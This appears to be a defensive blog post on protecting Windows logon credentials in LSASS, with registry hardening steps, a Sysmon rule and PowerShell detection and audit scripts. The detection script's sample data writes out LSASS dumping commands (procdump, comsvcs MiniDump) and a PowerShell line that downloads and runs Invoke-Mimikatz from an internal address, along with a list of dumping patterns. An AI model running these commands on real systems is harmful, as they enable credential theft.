
Mapping a network drive with credentials other than those of the logged-on user leaves those credentials in the memory of the local machine, which matters most when the account used is an administrator. Anyone who can read that memory (a local administrator, SYSTEM, or malware running as either) can recover them, so this common practice can lead to compromise via LSASS (Local Security Authority Subsystem Service), the Windows component that holds logon credentials in memory.
You Should Know: Hardening Windows Against Credential Theft
1. Disable Password Storage for Network Authentication
Apply this Group Policy Object (GPO) setting to stop Windows from saving credentials in Credential Manager for network authentication:
Local Security Policy > Security Options > Network access: Do not allow storage of passwords and credentials for network authentication
The policy is backed by the DisableDomainCreds value under HKLM\SYSTEM\CurrentControlSet\Control\Lsa, so on a stand-alone host it can be set directly from an elevated prompt (a domain GPO overwrites it at the next policy refresh):
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v DisableDomainCreds /t REG_DWORD /d 1 /f
Caveat: once set, Credential Manager no longer stores domain credentials, so "Remember my credentials" in the drive-mapping dialog, net use /savecred and saved RDP passwords stop working; announce this before rolling it out. It also does nothing about credentials already held in LSASS memory for the current session; that is what the next two steps address.
2. Protect LSASS from Memory Dumping
Attackers often dump LSASS to extract credentials. Mitigate this with:
– Enable LSASS Protection (RunAsPPL; Windows 10/11 & Server 2019+). A reboot is required; afterwards confirm it took effect with Event ID 12 from Microsoft-Windows-Wininit in the System log ("LSASS.exe was started as a protected process"). With value 1 a UEFI lock is also written on Secure Boot systems, so the setting cannot be undone by a registry edit alone, and any unsigned LSA plugins or SSPs will fail to load (they appear in the CodeIntegrity operational log), so inventory those first:
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v RunAsPPL /t REG_DWORD /d 1 /f
– Enable Credential Guard (Virtualization-Based Security). Credential Guard is not an optional Windows feature; it is turned on by enabling VBS and setting LsaCfgFlags (1 = enabled with UEFI lock, 2 = enabled without), then rebooting. It needs 64-bit hardware with virtualization extensions and Secure Boot and a supported SKU (not Home), and it breaks NTLMv1, Kerberos DES encryption and unconstrained delegation. Verify in msinfo32 under "Virtualization-based security Services Running":
reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v EnableVirtualizationBasedSecurity /t REG_DWORD /d 1 /f
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v LsaCfgFlags /t REG_DWORD /d 1 /f
3. Detect Suspicious Access to LSASS
Sysmon records handle opens on LSASS as Event ID 10 (ProcessAccess). It logs them but does not block them; blocking is what RunAsPPL and Credential Guard above are for. Minimal rule:
<Sysmon schemaversion="4.90">
  <EventFiltering>
    <RuleGroup name="LSASS Protection" groupRelation="or">
      <ProcessAccess onmatch="include">
        <TargetImage condition="contains">lsass.exe</TargetImage>
      </ProcessAccess>
    </RuleGroup>
  </EventFiltering>
</Sysmon>
On a busy host this rule is noisy (svchost, WMI and AV/EDR processes open LSASS constantly); in production exclude known-good SourceImage values or filter on GrantedAccess once you have seen what the host normally produces.
Save the XML as C:\sysmon_config.xml and deploy Sysmon:
sysmon.exe -accepteula -i C:\sysmon_config.xml
4. Automate Hardening with Open-Source Tools
Use HardeningKitty (scipag) to audit a host against its built-in finding lists. Audit mode is read-only and writes a CSV report; do not run its HailMary mode, which applies a finding list, on a production host without testing that list on a lab machine first:
Invoke-WebRequest -Uri "https://github.com/scipag/HardeningKitty/archive/refs/heads/master.zip" -OutFile "HardeningKitty.zip"
Expand-Archive -Path "HardeningKitty.zip" -DestinationPath "C:\HardeningKitty"
cd C:\HardeningKitty\HardeningKitty-master
Import-Module .\HardeningKitty.psm1
Invoke-HardeningKitty -Mode Audit -Log -Report
5. Monitor for Credential Dumping Attacks
- Detect Mimikatz-like activity in process creation events (Event ID 4688). This only works if "Audit Process Creation" is enabled together with "Include command line in process creation events"; otherwise the event carries no command line to match on:
Get-WinEvent -FilterHashtable @{ LogName = "Security"; Id = 4688 } | Where-Object { $_.Message -like "*mimikatz*" }
Matching on the tool name is trivially evaded by renaming the binary, so treat this as a low-effort tripwire and rely on the Sysmon LSASS access rule above for real coverage.
- Block WDigest (prevents plaintext passwords from being kept in LSASS memory). This is already the default on Windows 8.1/Server 2012 R2 and later (and on older versions with KB2871997), but attackers set the value back to 1 before dumping, so alert on changes to this key as well:
reg add "HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest" /v UseLogonCredential /t REG_DWORD /d 0 /f
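The following is an added example, not code from the original post, showing the triage logic behind sections 3 and 5 run offline over constructed telemetry: it filters Sysmon Event ID 10 records down to memory-read handles on LSASS from non-allowlisted processes, and matches 4688/Sysmon Event ID 1 command lines against known dumping patterns. The field names follow the Sysmon schema; the sample records, the $KnownGood allowlist and the $CmdPatterns list are assumptions to tune for your own estate.

```powershell
# Added example (not from the original post): offline triage of LSASS-access and
# process-creation telemetry. Field names follow the Sysmon Event ID 10 schema
# (SourceImage, TargetImage, GrantedAccess); the sample records, the allowlist and
# the command-line patterns are assumptions to tune for your own estate.

# Handle right that lets a process read LSASS memory: PROCESS_VM_READ (0x10).
# Mimikatz typically asks for 0x1010 or 0x1410; ProcDump/MiniDump ask for 0x1FFFFF.
$VmRead = 0x10

# Processes expected to open LSASS on a stock host (assumption; add your AV/EDR binaries).
$KnownGood = @(
    'C:\Windows\System32\svchost.exe',
    'C:\Windows\System32\csrss.exe',
    'C:\Windows\System32\wininit.exe',
    'C:\Windows\System32\wbem\WmiPrvSE.exe',
    'C:\Program Files\Windows Defender\MsMpEng.exe'
)

# Command-line fragments of common LSASS dumping techniques (assumption; extend as needed).
$CmdPatterns = @('*mimikatz*', '*sekurlsa*', '*procdump*lsass*', '*comsvcs*MiniDump*', '*lsass.dmp*')

function Find-SuspiciousLsassAccess {
    # Flags Event ID 10 records where a non-allowlisted process got a memory-read handle to LSASS.
    param([Parameter(Mandatory)][object[]]$Events)
    foreach ($e in $Events) {
        if ($e.TargetImage -notlike '*\lsass.exe') { continue }
        $mask = [Convert]::ToInt32($e.GrantedAccess, 16)       # Sysmon stores the mask as "0x...."
        if (($mask -band $VmRead) -eq 0) { continue }         # handle cannot read memory: ignore
        if ($KnownGood -contains $e.SourceImage) { continue }  # expected system/AV process: ignore
        [pscustomobject]@{
            Time          = $e.Time
            SourceImage   = $e.SourceImage
            GrantedAccess = ('0x{0:X}' -f $mask)
            Reason        = 'memory-read handle to LSASS from non-allowlisted process'
        }
    }
}

function Find-SuspiciousCommandLine {
    # Flags 4688 / Sysmon Event ID 1 command lines matching known dumping tools or LOLBin usage.
    param([Parameter(Mandatory)][string[]]$CommandLines)
    foreach ($c in $CommandLines) {
        foreach ($p in $CmdPatterns) {
            if ($c -like $p) { [pscustomobject]@{ CommandLine = $c; Pattern = $p }; break }
        }
    }
}

# Constructed sample telemetry for an offline run (not real captured data).
$SampleAccess = @(
    [pscustomobject]@{ Time = '2024-01-01T10:00:00'; SourceImage = 'C:\Windows\System32\svchost.exe'; TargetImage = 'C:\Windows\System32\lsass.exe'; GrantedAccess = '0x1000' },
    [pscustomobject]@{ Time = '2024-01-01T10:01:00'; SourceImage = 'C:\Users\alice\Downloads\mk.exe'; TargetImage = 'C:\Windows\System32\lsass.exe'; GrantedAccess = '0x1010' },
    [pscustomobject]@{ Time = '2024-01-01T10:02:00'; SourceImage = 'C:\Windows\Temp\pd64.exe'; TargetImage = 'C:\Windows\System32\lsass.exe'; GrantedAccess = '0x1FFFFF' },
    [pscustomobject]@{ Time = '2024-01-01T10:03:00'; SourceImage = 'C:\Program Files\Windows Defender\MsMpEng.exe'; TargetImage = 'C:\Windows\System32\lsass.exe'; GrantedAccess = '0x1FFFFF' }
)
$SampleCmdLines = @(
    'C:\Windows\System32\svchost.exe -k netsvcs',
    'procdump64.exe -accepteula -ma lsass.exe C:\Windows\Temp\out.dmp',
    'C:\Windows\Temp\pd64.exe -accepteula -ma lsass.exe C:\Windows\Temp\out.dmp',
    'rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump 652 C:\Temp\lsass.dmp full',
    'powershell.exe -nop -c "IEX (New-Object Net.WebClient).DownloadString(''http://10.0.0.5/Invoke-Mimikatz.ps1'')"'
)

# Expected: mk.exe (0x1010) and pd64.exe (0x1FFFFF) are flagged; svchost (no VM_READ) and MsMpEng (allowlisted) are not.
Find-SuspiciousLsassAccess -Events $SampleAccess | Format-Table -AutoSize
# Expected: the procdump64, comsvcs MiniDump and Invoke-Mimikatz lines are flagged. The renamed
# pd64.exe copy slips past the string match, but its handle open was still caught above.
Find-SuspiciousCommandLine -CommandLines $SampleCmdLines | Format-Table -AutoSize

# Live run: map Sysmon Event ID 10 EventData to the same shape and feed it to the function.
# $live = Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 10 } | ForEach-Object {
#     $d = ([xml]$_.ToXml()).Event.EventData.Data
#     [pscustomobject]@{
#         Time          = $_.TimeCreated
#         SourceImage   = ($d | Where-Object Name -eq 'SourceImage').'#text'
#         TargetImage   = ($d | Where-Object Name -eq 'TargetImage').'#text'
#         GrantedAccess = ($d | Where-Object Name -eq 'GrantedAccess').'#text'
#     }
# }
# Find-SuspiciousLsassAccess -Events $live
```

The point of the two functions side by side is the last sample: the renamed ProcDump copy defeats the command-line match but not the handle-based check, which is why the access-mask rule (with a maintained allowlist) is the one to alert on and the name match is only a tripwire.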
What Undercode Say
Credential exposure via network drive mapping is a critical yet overlooked attack vector. Attackers use tools like Mimikatz, ProcDump, and PowerShell Empire to extract credentials from LSASS. Implementing Credential Guard, LSASS Protection, and strict GPO policies reduces the attack surface.
Additional hardening steps:
- Refuse LM and NTLMv1 (NTLMv2 only). This does not disable NTLM: level 5 still sends and accepts NTLMv2. Fully restricting NTLM is a separate set of policies ("Network security: Restrict NTLM: ...") that should be rolled out in audit mode first:
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v LmCompatibilityLevel /t REG_DWORD /d 5 /f
- Require SMB Signing on the client side (the server side is the same value under Services\LanmanServer\Parameters):
reg add "HKLM\SYSTEM\CurrentControlSet\Services\LanmanWorkstation\Parameters" /v RequireSecuritySignature /t REG_DWORD /d 1 /f
- Restrict RDP Access. Enabling the "Remote Desktop" rule group with action=allow opens RDP rather than restricting it. To disable inbound RDP on hosts that do not need it:
netsh advfirewall firewall set rule group="Remote Desktop" new enable=no
Where RDP is required, keep the rule enabled but scope it to the management subnet (new remoteip=<management-subnet>) instead of leaving it open to any source.
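As an added example (not part of the original post), the script below reads back every registry setting this post recommends and reports drift, then checks that LSA protection and Credential Guard are actually running rather than merely configured: a registry value survives a reboot even when the hardware cannot honour it. It assumes an elevated PowerShell session; the check names and the accepted values (2 for the "without UEFI lock" variants of RunAsPPL and LsaCfgFlags) are the author's choices.

```powershell
# Added example (not from the original post): audit the hardening settings recommended
# above and confirm the runtime protections are live. Run from an elevated PowerShell.

# Expected values; RunAsPPL and LsaCfgFlags accept 2 ("enabled without UEFI lock") as well.
$Checks = @(
    @{ Name = 'No stored network creds (DisableDomainCreds)';    Path = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa';                           Value = 'DisableDomainCreds';                Expected = @(1) },
    @{ Name = 'LSASS as protected process (RunAsPPL)';           Path = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa';                           Value = 'RunAsPPL';                          Expected = @(1, 2) },
    @{ Name = 'Credential Guard configured (LsaCfgFlags)';       Path = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa';                           Value = 'LsaCfgFlags';                       Expected = @(1, 2) },
    @{ Name = 'VBS enabled';                                     Path = 'HKLM:\SYSTEM\CurrentControlSet\Control\DeviceGuard';                   Value = 'EnableVirtualizationBasedSecurity'; Expected = @(1) },
    @{ Name = 'WDigest plaintext disabled (UseLogonCredential)'; Path = 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest';     Value = 'UseLogonCredential';                Expected = @(0) },
    @{ Name = 'NTLMv2 only (LmCompatibilityLevel)';              Path = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa';                           Value = 'LmCompatibilityLevel';              Expected = @(5) },
    @{ Name = 'SMB client signing required';                     Path = 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanWorkstation\Parameters'; Value = 'RequireSecuritySignature';          Expected = @(1) },
    @{ Name = 'SMB server signing required';                     Path = 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters';      Value = 'RequireSecuritySignature';          Expected = @(1) }
)

function Get-RegValue {
    # Returns $null when the key or value is absent instead of throwing.
    param([string]$Path, [string]$Name)
    try { (Get-ItemProperty -Path $Path -Name $Name -ErrorAction Stop).$Name } catch { $null }
}

function Test-RegistryHardening {
    foreach ($c in $Checks) {
        $actual = Get-RegValue -Path $c.Path -Name $c.Value
        [pscustomobject]@{
            Check    = $c.Name
            Expected = ($c.Expected -join ' or ')
            Actual   = $(if ($null -eq $actual) { '(not set)' } else { $actual })
            Status   = $(if ($c.Expected -contains $actual) { 'PASS' } else { 'FAIL' })
        }
    }
}

function Test-RuntimeProtection {
    # A registry value only says "configured"; these two checks confirm the protections are live.
    $boot = (Get-CimInstance -ClassName Win32_OperatingSystem).LastBootUpTime

    # Wininit writes Event ID 12 to the System log when lsass.exe starts as a protected process.
    $ppl = Get-WinEvent -FilterHashtable @{ LogName = 'System'; ProviderName = 'Microsoft-Windows-Wininit'; Id = 12 } -MaxEvents 1 -ErrorAction SilentlyContinue
    [pscustomobject]@{
        Check    = 'LSASS started as PPL (Wininit Event ID 12 since last boot)'
        Expected = 'event newer than boot'
        Actual   = $(if ($ppl) { $ppl.TimeCreated } else { 'no event' })
        Status   = $(if ($ppl -and $ppl.TimeCreated -gt $boot) { 'PASS' } else { 'FAIL' })
    }

    # Win32_DeviceGuard: SecurityServicesRunning contains 1 when Credential Guard is running (2 = HVCI).
    $dg = Get-CimInstance -Namespace 'root\Microsoft\Windows\DeviceGuard' -ClassName Win32_DeviceGuard -ErrorAction SilentlyContinue
    [pscustomobject]@{
        Check    = 'Credential Guard running (Win32_DeviceGuard)'
        Expected = 'SecurityServicesRunning contains 1'
        Actual   = $(if ($dg) { ($dg.SecurityServicesRunning -join ',') } else { 'class unavailable' })
        Status   = $(if ($dg -and ($dg.SecurityServicesRunning -contains 1)) { 'PASS' } else { 'FAIL' })
    }
}

$results = @(Test-RegistryHardening) + @(Test-RuntimeProtection)
$results | Format-Table -AutoSize
if ($results.Status -contains 'FAIL') { Write-Warning 'One or more credential-theft hardening checks failed.' }
```

The runtime checks are the ones worth keeping in a scheduled job: a host can show LsaCfgFlags=1 and still run without Credential Guard because Secure Boot is off or the SKU is unsupported, and the Wininit event is the only cheap confirmation that LSASS actually came up as a PPL after the last reboot.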
Expected Output:
✅ GPO enforced: No credential storage for network access
✅ LSASS hardened: Protected via PPL & Credential Guard
✅ Logging enabled: Sysmon detects LSASS access
✅ Automated hardening: HardeningKitty audit reports generated
Reported By: Arisack Sivanh – Hackers Feeds


